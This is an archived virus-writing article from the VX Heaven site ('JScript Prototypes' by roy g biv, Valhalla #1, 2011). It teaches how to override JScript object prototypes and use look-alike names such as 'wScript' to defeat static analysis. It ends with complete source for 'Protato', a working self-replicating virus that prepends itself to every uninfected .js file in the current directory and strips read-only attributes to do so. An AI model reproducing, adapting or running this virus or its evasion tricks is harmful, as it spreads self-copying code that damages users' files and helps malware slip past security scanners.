Maximize
Bookmark

VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

JScript Prototypes

roy g biv
Valhalla #1
February 2011

1
[Back to index] [Comments]

What is a prototype?

JScript object methods use function prototypes which are the default handler when the method is called. We can create new methods for some objects by declaring a prototype with the name that we want to use. We can also change the handler for existing methods in some objects by declaring a prototype with the same name as that method.

Which objects?

We can add and change any method for these objects: Array, Boolean, Date, Function, Number, Object, String. That allows us to make a big problem for static analysis, because the method call might run something entirely other than before.

How to change the prototype?

There are two ways that we can change it. One way is to declare a function that will run. The function can be anonymous, and it can do anything that the script can do normally. It looks like this:

        Object.prototype.bar=function(){WScript.echo("Oops!")}
 

Here I use "object" as the object, and create a new method called "bar" which will display the message whenever the method is called. To call the method, we have to create a new object first, and the new object will have the changes, like this:

        foo=new Object
 

Then we call the method as usual:

        foo.bar()
 

and the message will display. We can change an existing method in the same way, like this:

        Date.prototype.getYear=function(){WScript.echo("Oops!")}
 

Then we create the object and call the method as usual, like this:

        foo=new Date
        foo.getYear()
 

It looks like it would return the current year, but instead it displays the message. Of course, you can pass parameters to the function if you declare them to the function, like this:

        String.prototype.fromCharCode=function(r){WScript.echo(r)}
        foo=new String
        foo.fromCharCode("Oops!")
 

That helps us to make more problems for static analysis, because it is hard to see which parameters are used. The other way to change the prototype is to include the code without the function declaration. Then the code will be called during object construction and no need to call the prototype at all!

        Array.prototype.r=WScript.echo("Oops!")
        new Array
 

and the message will display. This can execute only one command, though, but if you use "eval" there, and pass your code as parameter, then you can run as much as you want, like this:

        Array.prototype.r=eval
        foo = new Array
        foo.r("WScript.echo('Oops!')")
 

Another thing that we can do is to create a new object with a similar name to another object, and create a prototype with the same name as a "safe" method. One obvious choice for this is WScript. Since JScript is case-sensitive, we can create an object called "Wscript" or "wScript" which looks similar if not paying attention. Then we can create the "echo" prototype, and it looks like the code will print a message, but it's not the right one, like this:

        Date.prototype.echo={WScript.echo("Oops!")}
        wScript=new Date
        wScript.echo("unused")
 

Best of all, the code that is assigned to the prototype can be read back, so we do not need to carry our own source code, like this:

        Boolean.prototype.toString=function(r){WScript.echo(r)}
        foo = new Boolean
        WScript.echo(foo.toString)
 

will display "function(r){WScript.echo(r)}".

Let's see the code.

Date.prototype.r=function()
{
  /*Protato - roy g biv 22/02/11*/
  a=new ActiveXObject("scripting.filesystemobject")
  for(b=new Enumerator(a.getfolder(".").files);!b.atEnd();b.moveNext())
                                                //demo version, current directory only
  {
    if(a.getextensionname(c=b.item()).toLowerCase()=="js")
      try
      {
        d=a.opentextfile(c)                     //open potential victim
        e=d.read(1)                             //read first character, keep for later
        if(e!="D")                              //check for infection marker
          try
          {
            e+=d.readall()                      //read entire file
            f=c.attributes                      //save attributes
            c.attributes=0                      //remove any read-only attribute
            g=a.createtextfile(c)               //open file for writing
            g.write("Date.prototype.r="+r.r+";r=new Date;r.r();"+e)
                                                //prepend to file
            g.close()                           //close file (write mode)
            c.attributes=f                      //restore attributes
          }
          catch(z)
          {
          }
        d.close()                               //close file (read mode)
      }
      catch(z)
      {
      }
  }
}
r=new Date
r.r()
 

Greets to friendly people (A-Z):

Active - Benny - herm1t - hh86 - izee - jqwerty - Malum - Obleak - Prototype - Ratter - Ronin - RT Fishel - sars - SPTH - The Gingerbread Man - Ultras - uNdErX - Vallez - Vecna - Whitehead

rgb/defjam feb 2011
[email protected]
By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! vxheaven.org aka vx.netlux.org
deenesitfrplruua